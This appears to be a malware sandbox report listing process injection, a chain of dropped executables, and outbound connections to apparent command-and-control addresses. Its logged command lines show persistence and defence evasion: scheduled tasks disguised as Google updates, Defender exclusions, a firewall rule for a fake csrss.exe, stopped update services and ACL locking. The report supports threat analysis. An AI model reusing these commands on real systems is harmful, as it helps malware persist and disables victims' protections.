PID 2092 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5052593.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2092 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5052593.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2092 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5052593.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1600 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\19a6a588083633421ed63b0f889a6adfc7496bb4b02a23f9044678b1537df4b1.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c4318281.exe
PID 1600 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\19a6a588083633421ed63b0f889a6adfc7496bb4b02a23f9044678b1537df4b1.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c4318281.exe
PID 1600 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\19a6a588083633421ed63b0f889a6adfc7496bb4b02a23f9044678b1537df4b1.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c4318281.exe
PID 2556 wrote to memory of 1792 N/A N/A C:\Users\Admin\AppData\Local\Temp\BB41.exe
PID 2556 wrote to memory of 1792 N/A N/A C:\Users\Admin\AppData\Local\Temp\BB41.exe
PID 2556 wrote to memory of 1792 N/A N/A C:\Users\Admin\AppData\Local\Temp\BB41.exe
PID 1792 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Local\Temp\BB41.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WU8aU7xW.exe
PID 1792 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Local\Temp\BB41.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WU8aU7xW.exe
PID 1792 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Local\Temp\BB41.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WU8aU7xW.exe
PID 2556 wrote to memory of 3832 N/A N/A C:\Users\Admin\AppData\Local\Temp\BCF8.exe
PID 2556 wrote to memory of 3832 N/A N/A C:\Users\Admin\AppData\Local\Temp\BCF8.exe
PID 2556 wrote to memory of 3832 N/A N/A C:\Users\Admin\AppData\Local\Temp\BCF8.exe
PID 1532 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WU8aU7xW.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sh6hE7ZX.exe
PID 1532 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WU8aU7xW.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sh6hE7ZX.exe
PID 1532 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WU8aU7xW.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sh6hE7ZX.exe
PID 2044 wrote to memory of 4224 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sh6hE7ZX.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Ly3QD9BA.exe
PID 2044 wrote to memory of 4224 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sh6hE7ZX.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Ly3QD9BA.exe
PID 2044 wrote to memory of 4224 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sh6hE7ZX.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Ly3QD9BA.exe
PID 4224 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Ly3QD9BA.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Hq4pv4zr.exe
PID 4224 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Ly3QD9BA.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Hq4pv4zr.exe
PID 4224 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Ly3QD9BA.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Hq4pv4zr.exe
PID 2556 wrote to memory of 1544 N/A N/A C:\Users\Admin\AppData\Local\Temp\BE31.bat
PID 2556 wrote to memory of 1544 N/A N/A C:\Users\Admin\AppData\Local\Temp\BE31.bat
PID 2556 wrote to memory of 1544 N/A N/A C:\Users\Admin\AppData\Local\Temp\BE31.bat
PID 1920 wrote to memory of 3940 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Hq4pv4zr.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1oS28ea9.exe
PID 1920 wrote to memory of 3940 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Hq4pv4zr.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1oS28ea9.exe
PID 1920 wrote to memory of 3940 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Hq4pv4zr.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1oS28ea9.exe
PID 3832 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\BCF8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3832 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\BCF8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3832 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\BCF8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3832 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\BCF8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3832 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\BCF8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3832 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\BCF8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3832 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\BCF8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3832 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\BCF8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3832 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\BCF8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\19a6a588083633421ed63b0f889a6adfc7496bb4b02a23f9044678b1537df4b1.exe

"C:\Users\Admin\AppData\Local\Temp\19a6a588083633421ed63b0f889a6adfc7496bb4b02a23f9044678b1537df4b1.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3917847.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3917847.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a2851806.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a2851806.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 3716 -ip 3716

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3716 -s 152

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5052593.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5052593.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 2092 -ip 2092

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2092 -s 140

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 4708 -ip 4708

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4708 -s 540

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c4318281.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c4318281.exe

C:\Users\Admin\AppData\Local\Temp\BB41.exe

C:\Users\Admin\AppData\Local\Temp\BB41.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WU8aU7xW.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WU8aU7xW.exe

C:\Users\Admin\AppData\Local\Temp\BCF8.exe

C:\Users\Admin\AppData\Local\Temp\BCF8.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sh6hE7ZX.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sh6hE7ZX.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Ly3QD9BA.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Ly3QD9BA.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Hq4pv4zr.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Hq4pv4zr.exe

C:\Users\Admin\AppData\Local\Temp\BE31.bat

"C:\Users\Admin\AppData\Local\Temp\BE31.bat"

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1oS28ea9.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1oS28ea9.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3832 -ip 3832

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3832 -s 396

C:\Users\Admin\AppData\Local\Temp\C0F1.exe

C:\Users\Admin\AppData\Local\Temp\C0F1.exe

C:\Users\Admin\AppData\Local\Temp\C1DD.exe

C:\Users\Admin\AppData\Local\Temp\C1DD.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 3940 -ip 3940

C:\Users\Admin\AppData\Local\Temp\C384.exe

C:\Users\Admin\AppData\Local\Temp\C384.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1712 -ip 1712

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3940 -s 236

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1712 -s 196

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\BF39.tmp\BF3A.tmp\BF4B.bat C:\Users\Admin\AppData\Local\Temp\BE31.bat"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4600 -ip 4600

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4600 -s 412

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2yI890Ix.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2yI890Ix.exe

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffab6b746f8,0x7ffab6b74708,0x7ffab6b74718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffab6b746f8,0x7ffab6b74708,0x7ffab6b74718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2052,7452106453434838149,4049887481872662037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3432 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2052,7452106453434838149,4049887481872662037,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3416 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,7452106453434838149,4049887481872662037,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3260 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,7452106453434838149,4049887481872662037,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=3 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2888 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,7452106453434838149,4049887481872662037,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2872 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1980,16944698580324844675,444388564524661372,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1992 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1980,16944698580324844675,444388564524661372,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2412 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,7452106453434838149,4049887481872662037,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4048 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,7452106453434838149,4049887481872662037,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4704 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,7452106453434838149,4049887481872662037,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5676 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,7452106453434838149,4049887481872662037,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5660 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2052,7452106453434838149,4049887481872662037,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6080 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2052,7452106453434838149,4049887481872662037,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6080 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,7452106453434838149,4049887481872662037,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6228 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,7452106453434838149,4049887481872662037,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5056 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\F90C.exe

C:\Users\Admin\AppData\Local\Temp\F90C.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\source1.exe

"C:\Users\Admin\AppData\Local\Temp\source1.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\4180.exe

C:\Users\Admin\AppData\Local\Temp\4180.exe

C:\Users\Admin\AppData\Local\Temp\4430.exe

C:\Users\Admin\AppData\Local\Temp\4430.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 5824 -ip 5824

C:\Users\Admin\AppData\Local\Temp\4838.exe

C:\Users\Admin\AppData\Local\Temp\4838.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5824 -s 792

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 1364 -ip 1364

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1364 -s 772

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 83.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 54.120.234.20.in-addr.arpa udp
US 8.8.8.8:53 195.233.44.23.in-addr.arpa udp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 208.194.73.20.in-addr.arpa udp
FI 77.91.68.29:80 77.91.68.29 tcp
US 8.8.8.8:53 29.68.91.77.in-addr.arpa udp
RU 5.42.92.211:80 5.42.92.211 tcp
RU 5.42.65.80:80 5.42.65.80 tcp
US 8.8.8.8:53 211.92.42.5.in-addr.arpa udp
US 8.8.8.8:53 80.65.42.5.in-addr.arpa udp
FI 77.91.124.1:80 77.91.124.1 tcp
US 8.8.8.8:53 1.124.91.77.in-addr.arpa udp
FI 77.91.124.55:19071 tcp
FI 77.91.124.55:19071 tcp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 www.facebook.com udp
NL 157.240.247.35:443 www.facebook.com tcp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com tcp
NL 142.250.179.141:443 accounts.google.com udp
US 8.8.8.8:53 35.247.240.157.in-addr.arpa udp
